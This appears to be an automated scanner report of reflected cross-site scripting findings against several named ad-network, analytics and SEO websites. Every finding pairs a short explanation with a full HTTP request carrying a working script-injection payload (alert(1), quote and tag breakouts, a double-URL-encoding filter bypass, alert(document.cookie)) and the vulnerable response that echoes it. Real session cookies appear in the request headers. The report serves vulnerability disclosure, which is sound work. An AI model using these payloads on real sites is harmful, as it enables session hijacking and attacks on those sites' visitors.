GET /KonaGet.js?u=1300641701477&p=13764&k=http%3A//techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.htmljpNNP3&al=1&l=http%3A//techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html&t=How+To+Check+PageRank+in+Google+Chrome+%3F&m1=google+chrome+%2C+software&rId=67764811449365425e3f64"-alert(1)-"ece18e1998&rl=0&i=14&n=0&dc_aff_id=&cl=0&mp=0&rm=1&mod=8454171&rt=0&st=10&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_&1300641702329 HTTP/1.1 Host: kona5.kontera.com Proxy-Connection: keep-alive Referer: http://techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: KONA_USER_GUID=8564E29E-394C-11E0-9E36-00163E201081; cluid=21105147031300549481034; imprs=1
Response
HTTP/1.1 200 OK Content-Type: text/plain Connection: close Content-Length: 4982
The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload cb83f%3balert(1)//85d66a58941 was submitted in the callback parameter. This input was echoed as cb83f;alert(1)//85d66a58941 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /minimall?w=728&h=90&client=chr&noctxt=4&sid=ban0dt&url=http%3A//dnstree.com/cx/xss/&query=cx/xss/&type=mpu&noborders=1&vertical=premium&alturl=http%3A//www.robtex.com/ext/ads/buchban&screenres=1920x1200&winsize=1112x916&canvas=1096x139&frm=false&history=1&impsrc=amm&cb=490&loc=188,143&snip_title=xss.cx&output=simplejs&callback=ch_ad_render_searchcb83f%3balert(1)//85d66a58941 HTTP/1.1 Host: mm.chitika.net Proxy-Connection: keep-alive Referer: http://dnstree.com/cx/xss/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _cc=G/T85aQFoxB5939xhbwl+fD5hqWHYiCDbsDoTXiR7ghSSzFFqdkU6Ts8PN6LVdXA/7iSZXkL3XrgB9l9JAOZiPqF8KNw0jcJuzwnJ0NIVEts/AqvVXilg0aMVLxlBsr+syPvxNzXhB8Vi7qmCVPxNmekgCFp1dMafdeK8spGTWGzkRHU/W5O+G4k7JzRFd/0OOaCgztDFpGKCxZevA+jfM5EuGLu2Y29TlSe8PNFIHqWyl3cgKSBpgFob5hd8PJ0R/trAT1/JQSxLE6xVTTLwmMI684nd0shAmwLc1URONFbAFxm/PSCq7jShumiqMCNOoTJOM6Yspn8MxPkLMiQp+rNkiTN8AmRfq81fz/RyGmK9ABR7A3c0bkE+VHoCMp2pLYpP/q3YQG7/pU3y36HadhUF3RLx6b7.L80PgQYJuaF/eIHiHHkHjw.4
Response
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 17:38:15 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=; path=/; domain=.chitika.net; expires=Sun Mar 20 17:38:15 2011 GMT Set-Cookie: _cc=G/T0JjQk4hB9jgs/945Ie6ysuV2X6f1GrfGOHdAxHI3zqTuXgjz7bM7/T1WXxPf8Ww6nIcY40W3r/PZAPRtqT4kEWbw27AHuu7eesHE0zKA98aOz5KQgDOyXOQEOjeWydOBJhsv6+vvr2PgbU8P+6Onw2b5AFsWyr/dILE5iqQ+XgBOmNNiNXxbatocesUOeKotJCDOmQRvOPcwhfoItSntAauhGcRgzz5cKKFlTXqLHI0quCs8qK1ki+9479aQ2ySQnizMiTh+du10BiijDbTJK5o8yY/8DDXR/W5G8cWL1ofV+qx1vS+PJQboaDBQKvACKxxbF14jj86gkVcBp5uKfNjSA3fuH9p9BDEgvtWdbBDt7xotEZ5/WPerpDfoABM/4XZf9K1EgN/XBJrFfwQKSTDwWR8ZrakO09jevybpx154pt/ZowYHFhetY1hGR9F2JUZa7kiyygmrFQNDx.1U6UitWY/IGwylOoVpo0nA.4; path=/; domain=.mm.chitika.net; expires=Mon Mar 19 17:38:15 2012 GMT Vary: Accept-Encoding Connection: close Content-Type: application/x-javascript; charset=utf-8 Content-Length: 174
var ch_mmhtml = {"pixelhtml":"","reason":"no_items","alturl":"http://www.robtex.com/ext/ads/buchban","output":"","cb":"490"};ch_ad_render_searchcb83f;alert(1)//85d66a58941();
The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 773a1%0aalert(1)//6693e3626f3 was submitted in the url parameter. This input was echoed as 773a1 alert(1)//6693e3626f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gadgets/ifr?url=http://fcgadgets.appspot.com/spec/shareit.xml773a1%0aalert(1)//6693e3626f3&container=peoplesense&parent=http://saratogaindecline.blogspot.com/&mid=0&view=profile&libs=google.blog&d=0.556.7&lang=en&view-params=%7B%22skin%22:%7B%22FACE_SIZE%22:%2232%22,%22HEIGHT%22:%22200%22,%22TITLE%22:%22Share+it%22,%22BORDER_COLOR%22:%22transparent%22,%22ENDCAP_BG_COLOR%22:%22transparent%22,%22ENDCAP_TEXT_COLOR%22:%22%23999999%22,%22ENDCAP_LINK_COLOR%22:%22%2399aadd%22,%22ALTERNATE_BG_COLOR%22:%22transparent%22,%22CONTENT_BG_COLOR%22:%22transparent%22,%22CONTENT_LINK_COLOR%22:%22%2399aadd%22,%22CONTENT_TEXT_COLOR%22:%22%23999999%22,%22CONTENT_SECONDARY_LINK_COLOR%22:%22%2399aadd%22,%22CONTENT_SECONDARY_TEXT_COLOR%22:%22%23777777%22,%22CONTENT_HEADLINE_COLOR%22:%22%23aadd99%22,%22FONT_FACE%22:%22normal+normal+100%25+'Trebuchet+MS',Trebuchet,Verdana,Sans-serif%22%7D%7D&communityId=05889504503058521941&caller=http://saratogaindecline.blogspot.com/2011/02/transparency-and-nxivm.html HTTP/1.1 Host: ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 9ee5e<script>alert(1)</script>a73b3542d36 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 17:29:34 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1155
<html> <head> <title>Check PageRank For Your Website</title> <meta name="description" content="Checks PageRank for any given website or URL. This PageRank Checker is part of Techie Buzz tool ...[SNIP]... <b style="font-family:Verdana;font-size:11px">Page Rank for http://xss.cx/9ee5e<script>alert(1)</script>a73b3542d36 is 0 <img src="http://pagerank.techie-buzz.com/images/page-rank-0.gif" border="0" /> ...[SNIP]...
The value of the page_slots request parameter is copied into the HTML document as plain text between tags. The payload 49dc7<script>alert(1)</script>875f71569ea was submitted in the page_slots parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gampad/ads?correlator=1300641662876&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=ss&client=ca-pub-2703385610225771&page_slots=menu_links%2C336x280_above_post%2C336_below_post%2C160_600_sidebar_2%2C160_600_sidebar%2C300_sidebar_1%2C300_sidebar_3%2C728_above_footer%2Cin_links%2C728x90_top_banner49dc7<script>alert(1)</script>875f71569ea&cookie_enabled=1&ga_vid=26217198.1300641665&ga_sid=1300641665&ga_hid=473153756&url=http%3A%2F%2Ftechie-buzz.com%2Fsoftwares%2Fhow-to-check-pagerank-in-google-chrome.html&lmt=1300658136&dt=1300641664864&cc=16&biw=1112&bih=916&ifi=1&adk=0&u_tz=-300&u_his=1&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.2.154 HTTP/1.1 Host: pubads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TMedia=Coun%3ANA/Postal%3ANA/; TMediaISP=SoftLayer%20Technologies; id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __utmz=251550727.1300542524.1.1.utmcsr=mgid.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=251550727.1167224488.1300542524.1300542524.1300542524.1; L2676=1.1300710919721
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 20 Mar 2011 17:25:54 GMT Server: gfp-be Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 28644
GA_googleSetAdContentsBySlotForSync({"336x280_above_post":{"_type_":"html","_expandable_":false,"_html_":"\x3chtml\x3e\x3chead\x3e\x3cstyle\x3e\x3c!--\na:link { color: #000000 }a:visited { color: #000 ...[SNIP]... .com/pagead/sma8.js\"\x3e\x3c/script\x3e\x3c/body\x3e\x3c/html\x3e","_snippet_":false,"_height_":280,"_width_":336,"_empty_":false,"_is_afc_":true,"_is_psa_":false,"_is_3pas_":false},"728x90_top_banner49dc7<script>alert(1)</script>875f71569ea":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#0 ...[SNIP]...
The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload 5c027<script>alert(1)</script>d2c9d934be8 was submitted in the slotname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gampad/ads?correlator=1300632431167&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-6213915329796065&slotname=ServerInsiders-TopMost-AdUnit5c027<script>alert(1)</script>d2c9d934be8&page_slots=ServerInsiders-TopMost-AdUnit&cookie_enabled=1&ga_vid=1590812208.1300632431&ga_sid=1300632431&ga_hid=38308170&url=http%3A%2F%2Fserverinsiders.com%2Fisp%2Fsophidea-inc.html&lmt=1286371390&dt=1300632431168&cc=6&biw=1112&bih=916&ifi=1&adk=2135164243&u_tz=-300&u_his=1&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.2.154 HTTP/1.1 Host: pubads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://serverinsiders.com/isp/sophidea-inc.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TMedia=Coun%3ANA/Postal%3ANA/; TMediaISP=SoftLayer%20Technologies; id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __utmz=251550727.1300542524.1.1.utmcsr=mgid.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=251550727.1167224488.1300542524.1300542524.1300542524.1; L2676=1.1300710919721
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 20 Mar 2011 14:48:33 GMT Server: gfp-be Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 2769
GA_googleSetAdContentsBySlotForSync({"ServerInsiders-TopMost-AdUnit5c027<script>alert(1)</script>d2c9d934be8":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f ...[SNIP]...
The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 1e941%0aalert(1)//a64e8b16e22 was submitted in the url parameter. This input was echoed as 1e941 alert(1)//a64e8b16e22 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/members.xml1e941%0aalert(1)//a64e8b16e22&container=peoplesense&parent=http://saratogaindecline.blogspot.com/&mid=1&view=profile&libs=google.blog&d=0.556.7&lang=en&communityId=05889504503058521941&caller=http://saratogaindecline.blogspot.com/2011/02/transparency-and-nxivm.html HTTP/1.1 Host: r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 198b1'%3balert(1)//ec0fe0a2900 was submitted in the site parameter. This input was echoed as 198b1';alert(1)//ec0fe0a2900 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /js/counter.asp?site=s46seo101198b1'%3balert(1)//ec0fe0a2900 HTTP/1.1 Host: s46.sitemeter.com Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 20 Mar 2011 17:13:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Content-Length: 7316 Content-Type: application/x-javascript Expires: Sun, 20 Mar 2011 17:23:42 GMT Set-Cookie: IP=173%2E193%2E214%2E243; path=/js Cache-control: private
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58f06'%3balert(1)//280effdb020 was submitted in the site parameter. This input was echoed as 58f06';alert(1)//280effdb020 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /js/counter.js?site=s46seo10158f06'%3balert(1)//280effdb020 HTTP/1.1 Host: s46.sitemeter.com Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Sun, 20 Mar 2011 17:13:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Content-Length: 7316 Content-Type: application/x-javascript Expires: Sun, 20 Mar 2011 17:23:58 GMT Set-Cookie: IP=173%2E193%2E214%2E243; path=/js Cache-control: private
The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload c5cde</title><script>alert(1)</script>79857da5316 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde</title><script>alert(1)</script>79857da5316 HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title><script>alert(1)</script>79857da5316 SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff125"><script>alert(1)</script>977dd139795 was submitted in the REST URL parameter 1. This input was echoed as ff125\"><script>alert(1)</script>977dd139795 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxff125"><script>alert(1)</script>977dd139795 HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload 66c2d><script>alert(1)</script>659beb1f019 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C66c2d><script>alert(1)</script>659beb1f019/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3a22"><script>alert(1)</script>be6b50741a2 was submitted in the REST URL parameter 1. This input was echoed as a3a22\"><script>alert(1)</script>be6b50741a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Ca3a22"><script>alert(1)</script>be6b50741a2/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47dd0</script><script>alert(1)</script>5fe6e9ac091 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C47dd0</script><script>alert(1)</script>5fe6e9ac091/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 56312%253balert%25281%2529%252f%252fd47ddd65a86 was submitted in the REST URL parameter 2. This input was echoed as 56312;alert(1)//d47ddd65a86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C56312%253balert%25281%2529%252f%252fd47ddd65a86/css/default.css HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... <56312;alert(1)//d47ddd65a86/css/default.css SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload 5fc5e><script>alert(1)</script>c3566bfcb5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/5fc5e><script>alert(1)</script>c3566bfcb5f/css/default.css HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</5fc5e><script>alert(1)</script>c3566bfcb5f/css/default.css SEO101 Stats and Site Ranking</title>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65666"><script>alert(1)</script>0d80a9b1481 was submitted in the REST URL parameter 2. This input was echoed as 65666\"><script>alert(1)</script>0d80a9b1481 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C65666"><script>alert(1)</script>0d80a9b1481/css/default.css HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
<65666\"><script>alert(1)</script>0d80a9b1481/css/default.css seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b1236%253balert%25281%2529%252f%252f15c28f5c4bc was submitted in the REST URL parameter 3. This input was echoed as b1236;alert(1)//15c28f5c4bc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/cssb1236%253balert%25281%2529%252f%252f15c28f5c4bc/default.css HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</cssb1236;alert(1)//15c28f5c4bc/default.css SEO101 Stats and Site Ranking</title>
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cbc2"><script>alert(1)</script>0b7ff5a2d05 was submitted in the REST URL parameter 3. This input was echoed as 7cbc2\"><script>alert(1)</script>0b7ff5a2d05 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css7cbc2"><script>alert(1)</script>0b7ff5a2d05/default.css HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
